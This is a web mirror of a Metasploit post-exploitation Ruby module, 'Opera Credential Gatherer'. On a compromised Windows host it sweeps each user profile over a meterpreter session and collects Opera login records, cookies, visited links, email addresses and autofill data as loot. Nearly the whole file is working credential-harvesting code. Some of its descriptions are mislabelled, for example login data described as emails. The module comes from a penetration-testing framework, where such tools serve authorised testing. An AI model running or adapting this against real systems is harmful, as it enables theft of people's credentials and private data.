Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/opera.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::File

9
  include Msf::Post::Windows::UserProfiles

10
  include Msf::Post::Windows::Packrat

11
  ARTIFACTS =

12
    {

13
      application: 'opera',

14
      app_category: 'browsers',

15
      gatherable_artifacts: [

16
        {

17
          filetypes: 'logins',

18
          path: 'AppData',

19
          dir: 'Opera Software',

20
          artifact_file_name: 'Login Data',

21
          description: "Opera's sent and received emails",

22
          credential_type: 'sqlite',

23
          sql_search: [

24
            {

25
              sql_description: "Database Commands which exports SRware's Login data",

26
              sql_table: 'logins',

27
              sql_column: 'action_url, username_value'

28
            }

29
          ]

30
        },

31
        {

32
          filetypes: 'cookies',

33
          path: 'AppData',

34
          dir: 'Opera Software',

35
          artifact_file_name: 'Cookies',

36
          description: "Opera's Cookies",

37
          credential_type: 'sqlite',

38
          sql_search: [

39
            {

40
              sql_description: "Database Commands which exports SRware's Login data",

41
              sql_table: 'cookies',

42
              sql_column: 'host_key, name, path'

43
            }

44
          ]

45
        },

46
        {

47
          filetypes: 'web_history',

48
          path: 'AppData',

49
          dir: 'Opera Software',

50
          artifact_file_name: 'Visited Links',

51
          description: "Opera's Visited Links",

52
          credential_type: 'database',

53
          sql_search: [

54
            {

55
              sql_description: 'Database Commands which exports ',

56
              sql_table: 'cookies',

57
              sql_column: 'host_key, name, path'

58
            }

59
          ]

60
        },

61
        {

62
          filetypes: 'Email',

63
          path: 'AppData',

64
          dir: 'Opera Software',

65
          artifact_file_name: 'Session*',

66
          description: 'Emails stored in session file',

67
          credential_type: 'text',

68
          regex_search: [

69
            {

70
              extraction_description: 'searches for Email TO/FROM address',

71
              extraction_type: 'Email addresses',

72
              regex: [

73
                '(?i-mx:email=.*)',

74
              ]

75
            }

76
          ]

77
        },

78
        {

79
          filetypes: 'personal infomration',

80
          path: 'AppData',

81
          dir: 'Opera Software',

82
          artifact_file_name: 'Web Data',

83
          description: 'Auto filles sotred in the database',

84
          credential_type: 'sqlite',

85
          sql_search: [

86
            {

87
              sql_description: 'Database Commands which exports stored auto-fill data',

88
              sql_table: 'autofill',

89
              sql_column: 'name, value'

90
            }

91
          ]

92
        }

93
      ]

94
    }.freeze

95


96
  def initialize(info = {})

97
    super(

98
      update_info(

99
        info,

100
        'Name' => 'Opera Credential Gatherer',

101
        'Description' => %q{

102
          This module searches for Opera credentials on a Windows host.

103
        },

104
        'License' => MSF_LICENSE,

105
        'Author' => [

106
          'Kazuyoshi Maruta',

107
          'Daniel Hallsworth',

108
          'Barwar Salim M',

109
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org

110
        ],

111
        'Platform' => ['win'],

112
        'SessionTypes' => ['meterpreter'],

113
        'Notes' => {

114
          'Stability' => [CRASH_SAFE],

115
          'Reliability' => [],

116
          'SideEffects' => []

117
        }

118
      )

119
    )

120


121
    register_options(

122
      [

123
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

124
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

125
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

126
        # enumerates the options based on the artifacts that are defined below

127
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

128
      ]

129
    )

130
  end

131


132
  def run

133
    print_status('Filtering based on these selections:  ')

134
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

135
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

136
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

137


138
    # used to grab files for each user on the remote host

139
    grab_user_profiles.each do |userprofile|

140
      run_packrat(userprofile, ARTIFACTS)

141
    end

142


143
    print_status 'PackRat credential sweep completed'

144
  end

145
end

146


147